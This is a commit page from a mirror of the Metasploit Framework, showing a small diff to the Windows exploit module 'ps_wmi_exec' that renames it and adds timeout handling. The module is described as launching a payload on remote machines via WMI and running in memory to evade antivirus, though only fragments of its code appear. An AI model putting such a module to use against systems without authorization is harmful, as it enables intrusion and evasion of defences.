infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Title change and handling Rex::TimeoutError exception

bug/bundler_fix
wchen-r7 2016-11-16 16:23:44 -06:00
parent 7b83720b90
commit e1ff37f3eb
1 changed files with 17 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
modules/exploits/windows/local/ps_wmi_exec.rb
View File

@ -1,20 +1,15 @@
# -*- coding: binary -*-
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
##
# Ideally the methods to create WMI wrapper functions and their callers
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
##
require 'msf/core' require 'msf/core'
require 'msf/core/post/windows/powershell' require 'msf/core/post/windows/powershell'
require 'msf/core/post/windows/priv' require 'msf/core/post/windows/priv'
require 'msf/core/exploit/powershell/dot_net'
class Metasploit3 < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Post::Windows::Powershell include Msf::Post::Windows::Powershell
@ -23,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Authenticated WMI Exec via Powershell (Local Exploit)", 'Name' => "Authenticated WMI Exec via Powershell",
'Description' => %q{ 'Description' => %q{
This module uses WMI execution to launch a payload instance on a remote machine. This module uses WMI execution to launch a payload instance on a remote machine.
In order to avoid AV detection, all execution is performed in memory via psh-net In order to avoid AV detection, all execution is performed in memory via psh-net
@ -117,7 +112,6 @@ class Metasploit3 < Msf::Exploit::Local
end end
def exploit def exploit
# Make sure we meet the requirements before running the script # Make sure we meet the requirements before running the script
unless have_powershell? unless have_powershell?
fail_with(Failure::BadConfig, 'PowerShell not found') fail_with(Failure::BadConfig, 'PowerShell not found')
@ -137,7 +131,13 @@ class Metasploit3 < Msf::Exploit::Local
return return
end end
print_good("#{datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)}") begin
psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)
print_good(psh_output)
rescue Rex::TimeoutError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
vprint_good('PSH WMI exec is complete.') vprint_good('PSH WMI exec is complete.')
end end
@ -176,7 +176,13 @@ EOS
EOS EOS
return ps_wrapper return ps_wrapper
end end
end end
#
# Ideally the methods to create WMI wrapper functions and their callers
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
#